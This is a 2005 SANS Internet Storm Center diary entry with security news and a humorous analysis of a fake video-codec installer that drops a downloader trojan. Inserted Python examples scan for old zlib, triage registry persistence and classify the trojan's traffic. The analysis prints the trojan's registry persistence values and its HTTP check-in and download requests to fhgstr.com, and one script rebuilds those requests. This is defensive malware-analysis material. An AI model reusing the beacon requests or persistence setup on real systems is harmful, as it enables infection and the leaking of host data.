
SANS ISC InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-07-13



A question; New MSBA; Finding zlib; Evading Snort; Some Reading; FTBM VI: Hypnotized and EULAgized

Published: 2005-07-13
Last Updated: 2005-07-14 03:33:23 UTC
by Tom Liston (Version: 1)

A Question:



Anyone having problems with July MS patches? We've had scattered reports of issues. Let us know.

New Version of MBSA



Microsoft Baseline Security Analyzer (MBSA) 2.0 is available



Info: http://support.microsoft.com/?scid=kb;en-us;895660



Download: http://www.microsoft.com/technet/security/tools/mbsahome.mspx



Also, in case you missed it, there is new functionality that allows you to update other MS products (MS Office, etc...) using Windows Update. Check out the Windows Update web page for details:



http://windowsupdate.microsoft.com/



(Thanks Peter!)

Finding Vulnerable zlib Executables



When something like the recently announced zlib issues (http://isc.sans.org/diary.php?date=2005-07-10) becomes public, you're always told that it is imperative that you patch executables that have been statically linked with vulnerable versions of the library. But how the heck do you find them? In a really cool display of out-of-the-box thinking, Florian Weimer has come up with a way to put the open-source AV scanner ClamAV to work finding statically linked vulnerable versions of zlib.



http://www.enyo.de/fw/security/zlib-fingerprint/



(Thanks Erik)
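The idea behind that approach can be reproduced without an AV engine at all. The following is an added example, not Florian Weimer's signature set or anything from this diary: zlib's inflate.c and deflate.c each compile in a copyright banner of the form " inflate 1.2.2 Copyright 1995-2004 Mark Adler ", and that string survives static linking, so it is a byte signature like any other. The script walks a directory tree, reports every banner it finds with its version, and also emits the same fingerprint as a legacy ClamAV .db line (Name=HexBytes) for a ClamAV-driven sweep. The PATCHED_VERSION threshold is an assumption you set from the advisory you are working from, and the files written by build_sample_tree() are constructed fakes for the demo.

```python
"""Hunt for statically linked copies of zlib by their embedded version banners.

Added example; this is not Florian Weimer's ClamAV signature set or anything
from the ISC diary. zlib's inflate.c and deflate.c each carry a copyright
string of the form " inflate 1.2.2 Copyright 1995-2004 Mark Adler " that is
compiled into any binary that links zlib statically, so it can be matched the
same way an AV engine matches a byte signature. PATCHED_VERSION is an
assumption you set from the advisory you are working from; the "binaries"
built by build_sample_tree() are constructed fakes for the demo.
"""
import re
import tempfile
from pathlib import Path

# Assumption for this example: anything older than this needs a closer look.
PATCHED_VERSION = (1, 2, 3)

# " inflate 1.2.2 Copyright 1995-2004 Mark Adler " / " deflate ... Jean-loup Gailly "
ZLIB_BANNER = re.compile(rb"(inflate|deflate) (\d+(?:\.\d+){1,3}) Copyright (19\d\d-20\d\d)")


def parse_version(text: str) -> tuple:
    """'1.2.2' -> (1, 2, 2) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def fingerprint_blob(data: bytes) -> list:
    """Return one record per zlib banner found in a byte string (a binary may
    contain both the inflate and the deflate banner)."""
    hits = []
    for m in ZLIB_BANNER.finditer(data):
        version = m.group(2).decode()
        hits.append({
            "component": m.group(1).decode(),
            "version": version,
            "years": m.group(3).decode(),
            "offset": m.start(),
            "suspect": parse_version(version) < PATCHED_VERSION,
        })
    return hits


def scan_tree(root: Path) -> dict:
    """Fingerprint every regular file below root; files are read whole, which
    is fine for executables (chunk the reads if you point this at large data)."""
    results = {}
    for path in root.rglob("*"):
        if path.is_file():
            hits = fingerprint_blob(path.read_bytes())
            if hits:
                results[str(path.relative_to(root))] = hits
    return results


def clamav_db_line(version: str, component: str = "inflate") -> str:
    """The same banner expressed as a legacy ClamAV .db signature
    (Name=HexBytes), i.e. the form a ClamAV-driven sweep would load."""
    banner = f"{component} {version} Copyright".encode()
    return f"ZlibStatic.{version}={banner.hex()}"


def build_sample_tree(root: Path) -> None:
    """Constructed sample files: headers and padding around realistic banners."""
    root.mkdir(parents=True, exist_ok=True)
    (root / "old_server").write_bytes(
        b"\x7fELF" + b"\0" * 64
        + b" inflate 1.2.2 Copyright 1995-2004 Mark Adler " + b"\0" * 16)
    (root / "new_tool").write_bytes(
        b"MZ" + b"\0" * 32
        + b" deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly " + b"\0" * 8)
    (root / "notes.txt").write_bytes(b"no compression library in here\n")


def demo() -> dict:
    """Build the sample tree in a temp dir and scan it."""
    root = Path(tempfile.mkdtemp(prefix="zlibscan_"))
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        for h in hits:
            flag = "SUSPECT" if h["suspect"] else "ok"
            print(f"{path}: {h['component']} {h['version']} @0x{h['offset']:x} {flag}")
    print(clamav_db_line("1.2.2"))
```

Two caveats before you act on a hit list from something like this. Distribution vendors routinely backport a fix without bumping the banner, so a 1.2.2 hit in a distro-packaged binary is a lead to check against the vendor's errata, not a verdict; and the shared libz.so carries the same banner, so it will show up too, which is expected. Conversely, a product that bundled the zlib source and edited or removed the banner will be missed, so this complements a build-system or package inventory rather than replacing it.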

Possible Evasion in Snort Multi-Pattern Algorithm



There appears to be a problem with the default multi-pattern matching algorithm in the current release version of Snort that could allow attackers to evade detection. The suggested workaround (until Snort 2.4, which uses a different multi-pattern algorithm, becomes available) is to update your Snort configuration with the following line, which selects the Aho-Corasick matcher in place of the default:



config detection: search-method ac




(Thanks Bill)

Interesting Reading:



ICANN Suggestions to Protect Your Domain



ICANN's Security and Stability Advisory Committee has outlined several well-known and recent domain-name hijackings, including Panix.com, Hushmail.com and HZ.com, and listed where the system went wrong and what can be done to correct the flaws. It has made 10 findings and, in response, 10 recommendations for how the Internet industry and consumers themselves can make sure that people don't steal their online property.



http://www.icann.org/announcements/hijacking-report-12jul05.pdf



(Thanks, Pat!)

Mules: The Other End of the Phishing Line



Every day, we play whack-a-mole with phishers, Trojans, and scams. This story from USA Today talks about what goes on at the far end of the phishing line from what we see. Interesting stuff.



http://www.usatoday.com/money/industries/technology/2005-07-10-cyber-mules-cover_x.htm

Follow the Bouncing Malware VI: Hypnotized and EULAgized



Prelude



Before we begin this lil' walk on the wild side, I want to make sure we get some things straight right up front:



1) We're going to be talking about the seamier side of the Internet today, including sites which specialize in displaying photos and videos of poverty-stricken, 20-something men and women who obviously can't afford clothing. Oftentimes, these young men and women seem to be more than a bit "chummy" with each other as well. If you are offended by such things, please be assured that I will put forth my usual effort to maintain the dignity and decorum of the Handler's Diary, which is to say "none." Muddle through with us anyway, and you'll probably find that there is far more here to reinforce your disappointment in humanity than a few "candid" photos.



2) Praise, kudos, and large-denomination currency can be directed to me. Vitriolic complaints should be directed to my fellow handler, Cory Altheide (caltheide at isc.sans.org), who, this past February 2nd, used this space for a literary depiction of me standing in for Punxsutawney Phil, the world famous groundhog.



Why yes, I do hold a grudge.



3) Sweetheart... when you caught me looking at "those" sites, I really *was* doing research... see? Hello? Hello?

The Set-Up



It was a dark and stormy night (sorry, I always wanted to start a story that way...) and Joe Sixpack, our intrepid hero, was browsing the 'net, looking for something that, in the interest of decorum and not setting off "nanny filters," I can't mention. Let's just say that it sounds a lot like the word "thorn," and leave it at that.



Joe was looking for something different. Not wildly different, mind you, nothing on the order of... uh... let's say "animal husbandry," but something more than just the regular old... umm... anatomical studies. Joe wanted some *action*. Perhaps if he could find some video footage of legal-aged (for while Joe may be a pervert, he has some standards...) ladies and gentlemen... er... consummating their acquaintance, that would be good.



The Round-Up



Like most of your average, everyday letches, Joe heads on over to Google and does a bit o' searching. If it's worth finding on the Internet (and even if it ain't), Google is the place to go. If you've never searched for a... uh... "thorn-related" word on Google, you'll be awfully surprised at the sheer volume of responses that you receive. One time, I was legitimately searching for a specific type of those small, threaded fasteners... let's just say that it was a bit difficult to separate a tiny amount of wheat from a big ol' truck-load of chaff. But, I digress...



In any case, a little bit of searching leads Joe to an appropriate, inappropriate site.

The Hook



"Yes!" Joe says silently, as he peruses the listing of the various forms of "entertainment" that his new-found site has to offer.



What a selection it is: photos and videos of all kinds of things-- things that Joe has never even heard of. Things that would make a longshoreman blush. Men, women, birds, beasts, and devices in combinations and permutations that make an episode of Jerry Springer look like a church picnic.



Joe is in his element. He scrolls up and down the screen, looking at the listing and seeing all kinds of stuff he wants to check out. Finally, he can't help but click on a link to one of the steamier video feeds.

The Double-Cross



But instead of watching his screen fill with undulating bodies, Joe is disappointed when the following message pops up:



"To play new format video files correctly you need to download free video codec
update (9Kb) Click here. Free codecs provided by www.vcodec.com"



(Note: Standard "Follow the Bouncing Malware" rules apply here. The link above is non-clickable for a reason: you really, REALLY shouldn't go there. I may joke around about a lot of stuff, but not that. Don't do it.)



Joe, being Joe, has heard something about "codecs" before. He vaguely recalls something about them being used in Windows Media Player. He is actually pretty proud of himself when he remembers that the name "codec" is a portmanteau word created from the two functions that a codec serves: COmpression and DECompression. Maybe he?s finally getting the hang of this computer stuff after all.

The Tale



Joe surfs to the VCodec site and is pleased when he sees a whole lot of information that, although he doesn't understand it all, seems to confirm what he remembered. Yes, this "codec" thingie has something to do with compressed video.



"VCodec 1.47 FREE - New revolutionary video standard



VCodec includes a suite of powerful encoding tools enabling the highest levels of visual quality, compression and control. It plugs into your video software to produce high-quality movies (at one-tenth the size of a DVD) for viewing on your PC."

The Wire



Following that was an impressive list of "Technical Specifications" filled with technical sounding words like "Integrated Encoding Tools," "Bitrates," "Quantization," "De-interlacing" and something called "block motion compensation." It all sounded way too technical, but if he needed it to see what he needed to see, well, then, he needed it. (Say that ten times fast...) Besides, the site was very impressive and very professional looking. What could go wrong?



The Shut-Out



Joe was about ready to download the file, but there was something nagging at the back of his thoughts. Just before he clicked on the download link, it finally dawned on him: something is wrong. Back on the web page of his newest favorite site, there was a link that had said something about a "NEW updated version 3.5," and here, the VCodec site was only offering him version 1.47. What was going on?



He hadn't clicked on the download link on that page, because he had heard that these... uh... "thornography" sites weren't always on the up-and-up. But now, his curiosity was piqued.



Joe quickly clicked back to the video smorgasbord and carefully examined the direct download link found there. With a jaundiced eye, he looked carefully at what was displayed by his browser to make sure that the link was actually taking him to the VCodec site. It was! Ha! They weren't going to fool him. He was going to download the new, updated version of the codec. Version 3.5 had to be way better than version 1.47.

The Sting



Joe downloaded the file and installed it. It was all very professional. First, a window popped up, explaining that the executable was going to install the VCodec software, and giving him the option to cancel the installation. Then, he was presented with one of those End User License Agreements (EULA) and was forced to agree to it if he wanted to install the software. Joe always hated that, but he did it anyway... he sort of felt hypnotized by the thought of what he would be seeing when that DVD quality video was dancing across his screen...

The Big Con



The file that Joe downloaded was "vc3_05b.exe," a 16,373 byte long executable. On the VCodec site, there is also a file called "vc1_05a.exe" (9341 bytes) which is what you get if you follow the main "download" link on the VCodec site. Also, like an extra surprise, hidden on the vcodec.com index page is some JavaScript that attempts, in several ways, to download the file "vc105a.htm" which is simply a copy of vc1_05a.exe. Both files are packed with the executable compressor FSG, and while they are superficially different, running either of them has the same result: version 3.5 just has a dog-and-pony show to go along with it.



Perhaps by now, you've gotten the idea that we're not dealing with a plain old video codec here. After all, this *is* another installment of "Follow the Bouncing Malware." Well, no, it isn't just a codec.



In fact, it isn't a codec at all.



FSG, although it is a pain in the backside, isn't really too much of an obstacle if you know what you're doing. Un-packing vc3_05b.exe takes a little doing, but when you finally crack it open, it reveals plenty. Our buddy vc3_05b.exe has precious little to do with video compression, and much more to do with dropping an executable "gift" on your computer and then messing with the registry to automatically run it.



It adds two keys to the registry:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run



It adds the following values:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\uuid: "8dffcee8-49e4-443d-8606-b0502d81421f"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run\notepad.exe: "msmsgs.exe"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvr32: "C:\WINDOWS\System32\msmsgs.exe"



It modifies these values:



HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe" becomes "Explorer.exe, msmsgs.exe"



Finally (if you?re following closely, you?ve seen this one coming), it drops the file:



C:\WINDOWS\System32\msmsgs.exe
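If you have to check a fleet for this, the registry listing above is the whole indicator set. The script below is an added example, not code from this diary: it parses regedit's plain-text export format and applies three checks drawn from that listing, namely a Winlogon\Shell value that launches anything besides Explorer.exe, any value at all under policies\explorer\run (a policy-driven autorun that is normally empty), and a Run value that starts msmsgs.exe from anywhere other than Program Files\Messenger, which is where Windows Messenger's legitimate binary of the same name lives. The name collision is not an accident, and neither is the Run value being named "RegSvr32". SAMPLE_REG_EXPORT is constructed for the demo; the suspicious values in it mirror the diary, while the Userinit and ctfmon.exe lines are ordinary XP defaults added as benign noise.

```python
"""Triage a Windows .reg export for the persistence the VCodec dropper sets up.

Added example; not code from the ISC diary. It parses regedit's plain-text
export format and applies three checks drawn from the diary's registry
listing. SAMPLE_REG_EXPORT is constructed for the demo: the Shell, notepad.exe
and RegSvr32 values mirror the diary, the Userinit and ctfmon.exe lines are
ordinary XP defaults added as benign noise.
"""
import re

SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe, msmsgs.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run]
"notepad.exe"="msmsgs.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RegSvr32"="C:\\WINDOWS\\System32\\msmsgs.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
'''

WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
POLICY_RUN = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run"
RUN = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# where the real Windows Messenger msmsgs.exe lives on XP
LEGIT_MESSENGER_DIR = "\\program files\\messenger\\"

_KEY_LINE = re.compile(r'^\[(.+)\]$')
# "name"="data" with backslash escapes inside either string; REG_SZ only
_SZ_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    # .reg strings escape a backslash and a double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: string_data}}. Only REG_SZ lines are
    kept; dword:/hex: values are skipped since these checks do not need them."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        key = _KEY_LINE.match(line)
        if key:
            current = key.group(1)
            reg.setdefault(current, {})
            continue
        val = _SZ_LINE.match(line)
        if val and current is not None:
            reg[current][_unescape(val.group(1))] = _unescape(val.group(2))
    return reg


def _values(reg: dict, key: str) -> dict:
    # registry key names are case-insensitive and exports vary in casing
    for k, v in reg.items():
        if k.lower() == key.lower():
            return v
    return {}


def triage(reg: dict) -> list:
    """Apply the three checks and return human-readable findings."""
    findings = []
    shell = _values(reg, WINLOGON).get("Shell", "")
    extras = [p.strip() for p in shell.split(",")
              if p.strip() and p.strip().lower() != "explorer.exe"]
    if extras:
        findings.append("Winlogon\\Shell also launches: " + ", ".join(extras))
    for name, data in _values(reg, POLICY_RUN).items():
        findings.append(f"policies\\explorer\\run value {name!r} -> {data!r}")
    for name, data in _values(reg, RUN).items():
        lowered = data.lower()
        if "msmsgs.exe" in lowered and LEGIT_MESSENGER_DIR not in lowered:
            findings.append(f"Run\\{name} starts msmsgs.exe from an unexpected path: {data}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_reg_export(SAMPLE_REG_EXPORT)):
        print("[!]", finding)
```

Real "Windows Registry Editor Version 5.00" exports are written as UTF-16 with a byte-order mark, so decode the file as utf-16 before handing it to parse_reg_export(); the parser otherwise only cares about the key and REG_SZ lines it needs.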



The interesting thing about vc3_05b.exe is the little show that it gives us along the way, in order to make us think that everything is legitimate and above board. Joe saw it all: a confirmation "This will install Vcodec ver 3.15. Do you wish to continue?" dialog box, and an official looking EULA signoff. The funny thing is, none of it amounts to a hill of beans.



It doesn't matter how you answer any of their questions, your system is getting whacked while you're watching the show.



If you say you don't want to install their software, they install their software.



If you tell them to shove their EULA where the sun don't shine, you're still getting msmsgs.exe installed.



Heck, if you cancel the install, it even warns you: "Setup is not complete. If you quit the setup program now, the program will not be installed. Are you sure?" And then it installs msmsgs.exe anyway.



Lovely. Pond-scum with a sense of humor.



So, what is msmsgs.exe? Is it a video codec?



Sure it is...



...and I'm the Pope.



Setting aside (for now) the possibility of a Thomas the First papacy, it turns out that msmsgs.exe is actually just a nasty little downloader Trojan. It injects itself into Windows Explorer and then contacts the site "fhgstr.com":



GET /ping.php HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



If the fhgstr.com site replies with the ever-popular phrase:



0b723718-9389-4ca8-86f4-632a4bbc88a4



msmsgs.exe switches into "blabbermouth" mode and spills its guts:



GET /info.php?land=1033&uuid=7c75xb3b-955d-42ad-9xdf-17da5x645c0e&id=192.168.74.128&osl=English%20(United%20States) HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



telling the folks back home several interesting facts about its host. Not to be outdone in the blathering-gibberish department, fhgstr.com comes bouncing back (pun intended) with a rousing chorus of:



6e

M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so|HP7081700.so|P7091300.so|S7081700.so

0



To the untrained eye, that might just look like gobbledygook, and indeed, that's pretty much what it looked like to me. However, with a little bit of prodding, and tossing it the correct types of messages in the lab, msmsgs.exe knew *exactly* what to do, and proceeded to try to grab nine files with requests like the following:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1

User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038

Host: fhgstr.com

Cache-Control: no-cache
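The exchange above is regular enough to replay. What follows is an added example, not code from this diary or from the malware: it reconstructs the three stages (ping.php gate, info.php beacon, downloadex.php fetches) from the captured requests and responses and adds a proxy-side classifier keyed on the two User-Agent strings and the Host header. One point worth spelling out is the "6e" and "0" lines in the info.php reply: they are the hexadecimal chunk-size markers of an HTTP/1.1 chunked response, and 0x6e = 110 bytes is exactly the length of the pipe-delimited list plus a trailing newline, so the body has to be de-chunked before it is split on "|". The GO token, User-Agent strings, file names, query parameters and host are the diary's; the status lines and headers wrapped around them, the sequential download order and the labels returned by classify_request() are assumptions, and both responses are constructed from the quoted capture.

```python
"""Replay the fhgstr.com check-in and tasking logic observed in msmsgs.exe.

Added example; this is not code from the diary or from the malware. The two
responses below are constructed from the exchange quoted in the diary. The
6e / 0 lines the diary reproduces are HTTP/1.1 chunked-encoding size markers
(0x6e = 110 bytes: the pipe-delimited list plus a newline), which is why the
body is de-chunked before it is split. Status lines, surrounding headers,
download order and classify_request() labels are assumptions.
"""

GO_TOKEN = "0b723718-9389-4ca8-86f4-632a4bbc88a4"   # ping.php reply that unlocks stage 2
CHECKIN_UA = "blia, nu i v sad"
DOWNLOAD_UA = ("029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712"
               "-4917b-2c0812308b1c2038")
C2_HOST = "fhgstr.com"

# Constructed wire responses, CRLF line endings as on the wire.
PING_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: 36\r\n\r\n" + GO_TOKEN.encode()
INFO_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"6e\r\n"
    b"M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so"
    b"|HP7081700.so|P7091300.so|S7081700.so\n"
    b"\r\n0\r\n\r\n"
)


def split_response(raw: bytes):
    """(status line, {lowercased header: value}, raw body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body: bytes) -> bytes:
    """Minimal RFC 2616 chunked decoder: hex size CRLF, data CRLF, ..., 0 CRLF."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # drop chunk extensions
        if size == 0:
            return bytes(out)
        start = end + 2
        out += body[start:start + size]
        pos = start + size + 2                          # skip data and its CRLF


def response_body(raw: bytes) -> bytes:
    _, headers, body = split_response(raw)
    if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
        return decode_chunked(body)
    return body


def _request(path: str, ua: str) -> str:
    return (f"GET {path} HTTP/1.1\r\nUser-Agent: {ua}\r\n"
            f"Host: {C2_HOST}\r\nCache-Control: no-cache\r\n\r\n")


def ping_unlocked(raw: bytes) -> bool:
    """Stage 1: the downloader only proceeds if ping.php echoes GO_TOKEN."""
    return response_body(raw).strip().decode() == GO_TOKEN


def build_info_request(uuid: str, host_ip: str, lang_id: int = 1033,
                       os_lang: str = "English (United States)") -> str:
    """Stage 2 beacon. The diary's capture escapes only the spaces in osl=,
    so this does the same rather than fully URL-encoding the value."""
    query = f"land={lang_id}&uuid={uuid}&id={host_ip}&osl={os_lang.replace(' ', '%20')}"
    return _request(f"/info.php?{query}", CHECKIN_UA)


def parse_tasking(raw: bytes) -> list:
    """Stage 2 reply: the de-chunked body is a pipe-delimited list of files to fetch."""
    return [n for n in response_body(raw).decode().strip().split("|") if n]


def build_download_requests(names: list, lang_id: int = 1033) -> list:
    """Stage 3: one downloadex.php request per file, sent with the second User-Agent."""
    return [_request(f"/downloadex.php?file={n}&land={lang_id}", DOWNLOAD_UA) for n in names]


def classify_request(raw: str):
    """Proxy/IDS-side view: label a request by the Host and User-Agent strings
    quoted in the diary. None means it is not this downloader's traffic."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    hdrs = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    if hdrs.get("host", "").lower() != C2_HOST:
        return None
    ua = hdrs.get("user-agent", "")
    return {CHECKIN_UA: "checkin", DOWNLOAD_UA: "download"}.get(ua, "unknown-ua")


if __name__ == "__main__":
    if ping_unlocked(PING_RESPONSE):
        print(build_info_request("7c75xb3b-955d-42ad-9xdf-17da5x645c0e", "192.168.74.128"))
        names = parse_tasking(INFO_RESPONSE)
        for req in build_download_requests(names):
            print(classify_request(req), req.splitlines()[0])
```

For detection purposes the two User-Agent strings are the easy win (neither looks like anything a browser sends), but note that the beacon and the fetches use different ones, so a rule that only keys on "blia, nu i v sad" sees the check-in and misses the nine downloads that follow.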



(Note: Just in case you've not figured it out yet, working through what these little critters do is a somewhat painstaking combination of disassembly, debugging, and behavioral analysis under lab conditions. This isn't something that you should ever try, unless you really know what you're doing. If you mess up, you can end up infecting non-laboratory machines... not that *I* would ever do that, mind you, but I... uh... umm... know of people who have.)



So, what presents are waiting for us when msmsgs.exe gets done with its downloads? You'll have to wait until next week, when I'm on duty again for the next FTBM...



Here's a hint though: at the tail end of VCodec's EULA, there is this little gem:



"ADDENDUM: By accepting this agreement you also accept installing of free software helping you surf the web easily and get useful information in single click"



Setting aside for a moment the fact that their entire EULA looks like a really bad cut-n-paste job, why oh why can't these people put together a decent sentence?



Another butt-covering bite o' EULA:



"In return for the right to access this Content, you acknowledge and agree that the Software contains additional software products provided to SOFTREV by its suppliers which will periodically deliver additional Content such as, but not limited to, advertisements and promotional messages to your computer



Updates to Software.



The Software includes an automatic update feature to ensure that you have the most recently released version. You acknowledge and agree that SOFTREV or third parties designated by SOFTREV may from time to time provide automatic programming fixes, updates and upgrades to the Software (collectively, the Updates). Updates may include installation of third party applications, through automatic electronic dissemination and other means. You consent to such Updates and agree that the terms and conditions of this Agreement will apply to all such Updates. If you should elect not to have your software updated at any future time, SOFTREV shall not be responsible for any incompatibilities that may arise on your system and Computer."



Finally, I may not be able to write the next installment, because it appears that I might have, perhaps, somehow, inadvertently, without forethought or malice, accidentally, in some way (probably while under the influence of caffeine, so it's not really my fault) violated VCodec's EULA... especially the part that says I'm not allowed to reverse engineer their "product."



Oops... sorry 'bout that.



Hmmm... I'll make them a deal: when they actually have a product, I won't reverse engineer it.


-----------------------------------------------------------------

Handler on Duty: Tom Liston (tom at intelguardians dot com)
http://www.intelguardians.com